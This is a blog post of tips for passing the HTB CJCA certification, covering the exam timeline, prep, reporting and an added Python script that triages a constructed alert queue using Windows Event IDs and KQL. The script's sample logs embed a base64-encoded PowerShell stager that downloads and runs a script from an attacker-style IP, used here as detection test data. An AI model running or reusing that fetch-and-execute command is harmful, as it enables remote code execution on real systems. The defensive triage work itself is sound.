
CJCA : Here’s everything I wish someone told me

On 17th March, I cleared the CJCA. I’m not gonna write one of those sterile, perfectly polished “here is my glorious certification journey” posts.

This is a brain dump. Messy, honest, and (hopefully) actually useful to someone who is currently in the trenches grinding for this.

The Cert ✨

CJCA certificate

the numbers first

  • 5 exam days (started Feb 23, 6PM)
  • 5 machines, User + Root flag on each
  • An alert queue to triage (the number of alerts is variable)
  • 80 points minimum to pass

So, each machine flag is worth 10 points, and you need 80/100 minimum on the red side. But here’s the fun part:

Even if you nail 100 points technically, a bad report can still fail you. The report IS the exam. Treat it like the final boss from day one.

my prep (the honest version)

I did the CJCA learning path on HTB. That’s the baseline requirement, and I’m not gonna pretend I did anything extra fancy or bought expensive third-party courses.

Background context: I’m not really a blue team person. I haven’t explored it much. BUT I did a diploma project around the ELK stack, so I wasn’t going in completely blind. As for the red team part, I was already solving machines regularly, so muscle memory took over there.

The HTB learning path is a solid 10/10 for the red part, but it’s dangerously thin on blue team hands-on time. You’ll spend maybe 5-6 hours per blue module, and that is NOT enough to build muscle memory with ELK. I re-did the entire path once AND doubled down on the blue modules because of self-doubt. (Yes, imposter syndrome is a real problem here. Tip: don’t let it spiral).

what actually matters for prep:

  • Complete the full CJCA learning path on HTB. It's the baseline, don't skip the boring parts.
  • Solve Easy + Medium Linux AND Windows machines on HTB. I highly recommend clearing the Starting Point machines first.
  • Don't overcomplicate the red part. The 'Pentest in a Nutshell' module genuinely covers everything you need to know.
  • Spend real time in Kibana. Not tutorial-watching time; get hands-on. Practice filtering, threat hunting, and building KQL queries from scratch.
  • Install SysReptor BEFORE the exam. Do a full mock report on a random HTB machine to learn the UI. Thank me later 😋.
  • Expect the unexpected. There are some parts on the exam which are barely covered, so be ready to deal with the uncertainty. But they are very easy to research and get sorted with, so yea.. don't panic.

the 5-day timeline

Day 1 (6PM → 4AM): Rooted 3 machines in one sitting

Pushed the start button on Feb 23 around 6 PM. Didn’t overthink anything, just went with the flow, calm and collected. Got root on 3 machines by 4 AM. Decided to call it and sleep instead of pushing through the fatigue and making stupid mistakes.

Day 2 (12PM → night): Recovered properly, then finished red team

Woke up at noon. Ate. Went to the gym. Came back fresh at 6 PM. Cleared the last 2 machines on the red side. Got stuck in a few rabbit holes, but thanks to a rested mind, I was able to step back and recover pretty quickly. This is what recovery looks like: not grinding 40 hours straight on energy drinks like a maniac.

Day 3 (full day): Report writing + SysReptor struggle

Started prepping the report using SysReptor. Genuinely hard to figure out the workflow at first. Binged a tutorial for about an hour, understood the structure, and got comfortable fast since I already know markdown. Then… hit the blue team section and had a massive “okay, what the heck am I supposed to do here?” moment. Total brainfart. It’s not rocket science, just overwhelming. Spoiler: I didn’t give up.

Day 4 (fresh start): Blue team breakthrough

Started with a completely fresh mind. Went back to my notes, re-watched ELK stuff on YT, and re-read the HTB modules. Collected all the evidence methodically, tracked Event IDs, pieced the attack timelines together, and finished the second half of the report. Done with everything by the end of the day. Anxious? Yes. Underconfident on blue team? Very yes. But done.

Day 5 (final review): The polish pass

Spent the whole day redoing everything. Looking for gaps in my logic. Ensuring every screenshot had a purpose. Polishing the report to within an inch of its life. Submitted feeling like I’d done everything I could. Hesitant? Yes. But I did it.

exam structure: what you’re actually doing

⚔️ Red Team
  • 5 machines total.
  • Get User + Root on each.
  • 10 pts per flag.

Straightforward if you’ve been solving machines regularly. Don’t overthink the vectors, the “Pentest in a Nutshell” module covers the exact scope you’ll face.

🛡️ Blue Team

This is the part people sleep on, and they absolutely shouldn’t.

  • You are given a large alert queue (volume varies, check your exam brief).
  • You need to analyze the logs to determine what happened.
  • For each alert, you mark it FP (False Positive) or TP (True Positive) and write a clear explanation backed by hard evidence (screenshots, queries, Event IDs) from the ELK instance.

reporting: don’t sleep on SysReptor

Read this before the exam starts: HTB CJCA Sample Report (SysReptor): https://docs.sysreptor.com/assets/reports/HTB-CJCA-Report.pdf

  • Install SysReptor before exam day. Set up a CJCA template so you aren’t formatting tables while the clock is ticking.
  • Every finding = explanation + screenshot + reproducible steps. No exceptions.
  • If you know markdown, SysReptor becomes comfortable fast. But you need to learn the UI first, not mid-exam (unlike someone who’s writing this blog xD).
  • Collect outputs, commands, and screenshots as you go. Going back to a machine to reconstruct an exploit path under stress is rough 😕.

the modules: my way of learning

Not all modules are equal. Here’s how I’d split them up conceptually: (Note: These primers won’t feel directly exam relevant, but they’re what make everything else click. Don’t skip them thinking you already know the stuff.)

Primers (do these first) : connect the dots before everything else
Intro to Information Security
Network Foundations
Introduction to Networking
Linux Fundamentals
Intro to Bash Scripting
Windows Fundamentals
Web Requests
Intro to Web Apps
Intro to Penetration Testing
Intro to Network Traffic Analysis
Incident Handling Process

A quick reality check: There are some parts on the exam which are barely covered in these modules. Be ready to deal with the uncertainty. The good news? Those parts are very easy to research on the fly and get sorted with, so yea.. don’t lose your mind if you see something unfamiliar. Just Google it, adapt, and evolve.

Core exam modules (use during the exam) : you'll actually use these
Intro to Windows Command Line
Pentest in a Nutshell
Network Enumeration with Nmap
Footprinting
Hacking WordPress
Using Metasploit
Blue team deep dives (spend extra time) : spend more time here than you think
Windows Event Logs & Finding Evil
Security Monitoring & SIEM Fundamentals
Intro to Threat Hunting & Hunting with Elastic

Seriously, the blue team modules are where most people underinvest. The path gives you enough to understand the concepts, but not enough to get your hands dirty. Go beyond the modules. Open up a lab, generate some noise, and hunt it yourself. I’d recommend running through the Blue labs at least 2X.

what i’d do differently

  • Spend WAY more time on blue team prep. I panicked a lot during that phase, and it was entirely avoidable.
  • More real Kibana practice: Not just watching videos, but actually building KQL queries, filtering noise, and hunting through raw logs.
  • Read the sample SysReptor CJCA report before day one: https://docs.sysreptor.com/assets/reports/HTB-CJCA-Report.pdf
  • Practice SysReptor on a dummy report before the clock starts.
  • Practice querying Sysmon logs, Windows event logs, and analyzing parent/child process relationships.
  • Get intimately comfortable with critical Windows Event IDs and what they actually mean in an attack context.

Do these SIEM/ELK labs earlier: Awesome-Splunk-and-Elastic-SIEM-Practice-Labs 
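To make the blue-team work concrete (the TP/FP alert triage described in the Blue Team section above, and the Kibana/KQL, Sysmon, Event ID and parent/child process practice recommended in this section), here is an added Python example. It is not from the original post and not HTB's material: the hosts, users, IP addresses, alert rules and log events are all constructed by me, shaped the way Winlogbeat/Elastic Agent index Windows events (ECS field names such as event.code and process.parent.name), so the KQL in the comments is what you would type into Kibana to pull the same evidence.

```python
"""Added example (not from the original post or HTB): triage a constructed SIEM alert
queue over ECS-shaped Windows events. Assumptions are mine: field names follow ECS as
indexed by Winlogbeat; hosts, users, IPs, rules and events are constructed."""
import base64, binascii
from datetime import datetime, timedelta

OFFICE = {"winword.exe", "excel.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe"}
PROC_CREATE = {"1", "4688"}            # Sysmon EID 1 / Security EID 4688: process creation
LOGON_FAIL, LOGON_OK = "4625", "4624"  # Security log: failed / successful logon

def ev(t, host, code, fields):
    """Build one constructed ECS-style document from dotted field names."""
    doc = {"@timestamp": t, "host": {"name": host}, "event": {"code": code}}
    for path, value in fields.items():
        *parents, leaf = path.split(".")
        cur = doc
        for k in parents:
            cur = cur.setdefault(k, {})
        cur[leaf] = value
    return doc

STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.7/a.ps1')"
B64 = base64.b64encode(STAGER.encode("utf-16-le")).decode()  # how -EncodedCommand args are made
SAMPLE_EVENTS = [  # constructed, not real logs
    ev("2026-02-24T09:10:01Z", "WS01", "1", {"process.name": "winword.exe", "process.parent.name": "explorer.exe",
       "process.command_line": "WINWORD.EXE invoice.docm", "user.name": "j.doe"}),
    ev("2026-02-24T09:10:07Z", "WS01", "1", {"process.name": "powershell.exe", "process.parent.name": "winword.exe",
       "process.command_line": f"powershell.exe -nop -w hidden -enc {B64}", "user.name": "j.doe"}),
    ev("2026-02-24T11:00:00Z", "SRV02", "4688", {"process.name": "powershell.exe", "process.parent.name": "svchost.exe",
       "process.command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1", "user.name": "svc_backup"}),
    ev("2026-02-24T08:00:00Z", "DC01", LOGON_FAIL, {"source.ip": "10.10.20.5", "user.name": "a.smith"}),
    ev("2026-02-24T08:00:09Z", "DC01", LOGON_FAIL, {"source.ip": "10.10.20.5", "user.name": "a.smith"}),
] + [ev(f"2026-02-24T13:00:{s:02d}Z", "DC01", LOGON_FAIL, {"source.ip": "10.10.14.7", "user.name": "administrator"})
     for s in range(0, 60, 10)] + [
    ev("2026-02-24T13:01:05Z", "DC01", LOGON_OK, {"source.ip": "10.10.14.7", "user.name": "administrator"})]
ALERT_QUEUE = [  # constructed; A-003 comes from a deliberately noisy rule that fires on any "-E*" switch
    {"id": "A-001", "rule": "office_spawns_shell", "host": "WS01"}, {"id": "A-002", "rule": "encoded_powershell", "host": "WS01"},
    {"id": "A-003", "rule": "encoded_powershell", "host": "SRV02"}, {"id": "A-004", "rule": "logon_brute_force", "source_ip": "10.10.14.7"},
    {"id": "A-005", "rule": "logon_brute_force", "source_ip": "10.10.20.5"}]

def get(doc, path, default=""):
    """Read a dotted ECS path such as process.parent.name."""
    for k in path.split("."):
        doc = doc.get(k) if isinstance(doc, dict) else None
    return default if doc is None else doc
def ts(doc): return datetime.strptime(doc["@timestamp"], "%Y-%m-%dT%H:%M:%SZ")
def cite(doc, why):
    """One evidence line: timestamp, host and Event ID, the three things a reviewer checks first."""
    return f"{doc['@timestamp']} {get(doc, 'host.name')} EID {get(doc, 'event.code')}: {why}"

def encoded_payload(cmdline):
    """Return the decoded -EncodedCommand script, or None. PowerShell accepts any unambiguous
    prefix (-e, -ec, -enc ...), so match on prefix, not on the literal switch name."""
    parts = cmdline.split()
    for flag, arg in zip(parts, parts[1:]):
        name = flag[1:].lower()
        if flag[:1] in "-/" and name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(arg, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None  # e.g. "-e hidden": a switch prefix, but no encoded payload behind it
    return None

def hunt_office_child(events, host):
    # KQL: host.name:"WS01" and event.code:(1 or 4688) and process.parent.name:(winword.exe or excel.exe or outlook.exe) and process.name:(cmd.exe or powershell.exe or wscript.exe or mshta.exe)
    return [e for e in events if get(e, "host.name") == host and get(e, "event.code") in PROC_CREATE
            and get(e, "process.parent.name").lower() in OFFICE and get(e, "process.name").lower() in SHELLS]

def hunt_encoded_ps(events, host):
    # KQL: host.name:"SRV02" and event.code:(1 or 4688) and process.name:powershell.exe   (then read every command line)
    ps = [e for e in events if get(e, "host.name") == host and get(e, "event.code") in PROC_CREATE
          and get(e, "process.name").lower() == "powershell.exe"]
    return [(e, encoded_payload(get(e, "process.command_line"))) for e in ps]

def hunt_logon_burst(events, src, threshold=5, window=timedelta(minutes=5)):
    # KQL: source.ip:"10.10.14.7" and event.code:(4625 or 4624)  sorted by @timestamp; the count-in-window is done here
    fails = sorted((e for e in events if get(e, "event.code") == LOGON_FAIL and get(e, "source.ip") == src), key=ts)
    wins = sorted((e for e in events if get(e, "event.code") == LOGON_OK and get(e, "source.ip") == src), key=ts)
    for i in range(len(fails) - threshold + 1):
        burst = fails[i:i + threshold]
        if ts(burst[-1]) - ts(burst[0]) <= window:
            return fails, burst, [w for w in wins if ts(w) > ts(burst[-1])]
    return fails, [], []

def triage(alert, events):
    """Classify one alert TP/FP and return the evidence lines the report must cite."""
    rule = alert["rule"]
    if rule == "office_spawns_shell":
        hits = hunt_office_child(events, alert["host"])
        if hits:
            return "TP", [cite(e, f"{get(e, 'process.parent.name')} -> {get(e, 'process.name')} as {get(e, 'user.name')}") for e in hits]
        return "FP", [f"no process creation on {alert['host']} with an Office parent and a shell child"]
    if rule == "encoded_powershell":
        seen = hunt_encoded_ps(events, alert["host"])
        decoded = [(e, p) for e, p in seen if p is not None]
        if decoded:
            return "TP", [cite(e, f"parent {get(e, 'process.parent.name')}, decoded payload: {p}") for e, p in decoded]
        return "FP", [cite(e, f"no encoded payload; parent {get(e, 'process.parent.name')}, user {get(e, 'user.name')}, "
                              f"cmdline {get(e, 'process.command_line')}") for e, _ in seen]
    if rule == "logon_brute_force":
        fails, burst, wins = hunt_logon_burst(events, alert["source_ip"])
        if burst:
            lines = [cite(burst[0], f"first of {len(burst)} 4625 for {get(burst[0], 'user.name')} within {ts(burst[-1]) - ts(burst[0])}")]
            lines += [cite(w, "4624 from the same source after the burst: the password was guessed") for w in wins] or ["no 4624 followed: attempt only, still a TP"]
            return "TP", lines
        return "FP", [f"only {len(fails)} 4625 from {alert['source_ip']}, below the 5-in-5-minutes threshold"]

def triage_queue(alerts, events):
    return {a["id"]: triage(a, events) for a in alerts}

if __name__ == "__main__":
    for aid, (verdict, lines) in triage_queue(ALERT_QUEUE, SAMPLE_EVENTS).items():
        print(f"{aid} {verdict}", *lines, sep="\n    ")
```

Run it as-is and it prints a verdict plus evidence lines per alert. The point is that a TP/FP call is only as good as the timestamps, hosts and Event IDs you can cite for it, and that a noisy rule (A-003 here) is an FP you still have to explain from the command line and parent process rather than just dismiss. Decoding the -EncodedCommand payload on WS01 also hands you the attacker IP that then shows up in the 4625 burst on DC01, which is exactly the kind of cross-host link a timeline in the report should make.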

what about AI?

Honestly? It comes down to your ethics.

I didn’t care about using AI during the exam. I’ve always seen HTB as a learning opportunity first; the cert is just a byproduct of actually getting good. If you’re using AI to skip the understanding, you’re only cheating the learning, not the exam. Imagine paying for a practical exam and using AI to cheat yourself out of the practice? 😭

If you’re doing this to actually get better at security, use AI as a tool (like explaining a weird command output), not a crutch. If you’re doing this just to collect a shiny badge, that’s a you problem.

tldr for people who scrolled here first

  • Do the HTB path, but don’t stop there. Solve machines in the HTB labs Starting Point section, and do extra ELK/SIEM labs.
  • Blue team is where people get caught off guard. Take it seriously.
  • There will be things on the exam barely covered in the learning path. Don’t panic; just research them on the fly.
  • The report is not optional fluff. It’s the whole thing. A bad report = a failed exam.
  • Sleep, eat, and hit the gym during the exam. Recovery is a valid strategy.
  • Learn SysReptor before day one. Set up the template. Read the sample report.
  • Trust your prep. The self-doubt spiral is real and a massive waste of energy.
  • Believe in yourself. You can do it.
#CJCA #HTB #Certification #BlueTeam #RedTeam #PurpleTeam #ELKStack #Elastic #Kibana #Splunk #SIEM #ThreatHunting #SysReptor #Reporting #PenetrationTesting #IncidentResponse #Windows #Linux #Metasploit #OSINT